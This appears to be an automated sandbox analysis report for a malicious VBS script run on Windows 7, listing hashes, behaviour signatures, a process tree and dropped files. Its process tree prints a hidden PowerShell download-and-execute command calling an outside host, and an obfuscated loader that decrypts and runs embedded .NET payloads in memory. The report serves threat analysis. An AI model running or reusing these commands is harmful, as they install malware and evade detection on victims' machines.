Overview

overview

10

Static

static

1

b89759e937...df.vbs

windows7-x64

8

b89759e937...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    13-12-2024 02:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf.vbs

  • Size

    67KB

  • MD5

    9ffb1e62265a9b36d8c29afafc14f6fe

  • SHA1

    7e0abfdff1019bf28267f069b6fdf6658eb742b5

  • SHA256

    b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf

  • SHA512

    7458a2fb582a0a314ff9d443515ab4379e9a71e26ccf0788e971898b32be58b64f82771dfc901eafe9e28db0755146432f02be5892fb64188c129e72f3d402f0

  • SSDEEP

    1536:VpR0fCWy9wwuo9MIA9Y31BYfHAoH7XpUoQ0tThvi:j8vwwI9Mz9Y3GZ19Q6hvi

Score
8/10
executionpersistence

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf.vbs"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2788
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$tSzt='CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),'TreKpmaneKpmsfeKpmormeKpmFeKpmineKpmaeKpmlBeKpmloceKpmkeKpm'.Replace('eKpm', ''),'ErHgtlemrHgtentrHgtAtrHgt'.Replace('rHgt', ''),'LoaWwjgdWwjg'.Replace('Wwjg', ''),'DecGFmyompGFmyrGFmyessGFmy'.Replace('GFmy', ''),'CrFbwFeFbwFateFbwFDecFbwFrFbwFyptFbwForFbwF'.Replace('FbwF', ''),'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),'MaBxbRinBxbRMBxbRodBxbRulBxbReBxbR'.Replace('BxbR', ''),'SpYdNplpYdNipYdNtpYdN'.Replace('pYdN', ''),'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),'ReNXtTadLNXtTinNXtTesNXtT'.Replace('NXtT', ''),'GePRsKtCPRsKurPRsKrPRsKePRsKntPRsKPrPRsKoPRsKcPRsKesPRsKsPRsK'.Replace('PRsK', ''),'ChpQqmangpQqmeEpQqmxtepQqmnpQqmsipQqmonpQqm'.Replace('pQqm', ''),'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '');powershell -w hidden;function aRtvG($VLEjt){$KNVsD=[System.Security.Cryptography.Aes]::Create();$KNVsD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KNVsD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KNVsD.Key=[System.Convert]::($tSzt[13])('ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=');$KNVsD.IV=[System.Convert]::($tSzt[13])('Zwl9jKpodheYgolhwF+ZoA==');$NvSea=$KNVsD.($tSzt[5])();$ocMex=$NvSea.($tSzt[1])($VLEjt,0,$VLEjt.Length);$NvSea.Dispose();$KNVsD.Dispose();$ocMex;}function DyGwn($VLEjt){$TnJXr=New-Object System.IO.MemoryStream(,$VLEjt);$ALCZl=New-Object System.IO.MemoryStream;$vftmX=New-Object System.IO.Compression.GZipStream($TnJXr,[IO.Compression.CompressionMode]::($tSzt[4]));$vftmX.($tSzt[0])($ALCZl);$vftmX.Dispose();$TnJXr.Dispose();$ALCZl.Dispose();$ALCZl.ToArray();}$bjAKz=[System.IO.File]::($tSzt[10])([Console]::Title);$AliFC=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 5).Substring(2))));$vtSyn=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 6).Substring(2))));[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null);[System.Reflection.Assembly]::($tSzt[3])([byte[]]$AliFC).($tSzt[9]).($tSzt[6])($null,$null); "
          4⤵
            PID:2240
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1724

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\system.bat
      Filesize

      66KB

      MD5

      5f705dae5b64c2091db9b36fed377e74

      SHA1

      10209ca44ec5fc7289371296f0113e5001a7a3d2

      SHA256

      de81ae7b4398a1ec4091ad8e9ed9cf4fdc1ed88b7b1af8a5d07aacba1b0f4af7

      SHA512

      23b077a0fd01fa85a9f81b2f14db30a99a44bc3a1c45131f235fdf0c87542d33b4ea042db620fa50c924e214ce1e428eb05d0f651f7119979e07767df3b17878

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      63e4c2562fc4e01e628a5578b249afdc

      SHA1

      58ae9aeb4cdfc8ffec74291d61bc2b0aa655d607

      SHA256

      08d8a59aa874bc80712526f68b0340ec3ab130555ea3b76397d5660a9459a354

      SHA512

      e223c6ae4184d740e6c64409215ec4ca34f883cc34c3cd9aeb3758e3d8e006c666f1dbd0c1994a96d5148f3349c99746da7f719eb5dd52ea7d2ff9106b1e6c75

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TESEM5ITJJHV5OWVPZYY.temp
      Filesize

      7KB

      MD5

      015c54c8503c5b635dbccc01a65d7716

      SHA1

      a4c7f6db2504280b1eee037595f13c7bbba18d75

      SHA256

      1f54c5f6c595991680499fc6cdb5d55863f497b3f6a073ea0c3aef962123548b

      SHA512

      15718543ddf05775366422d0ec74e20c0c7477b796ff0257073b4804e1b20d1ca9fc84004dca3e695cf622bab9c3eb5d7f50f1ae74201f2ab07ab454574828e1

      Download Submit

    • memory/1724-27-0x0000000001D70000-0x0000000001D78000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1724-26-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2788-7-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2788-10-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2788-11-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2788-9-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2788-8-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2788-4-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2788-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2788-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

      Filesize

      2.9MB

      Download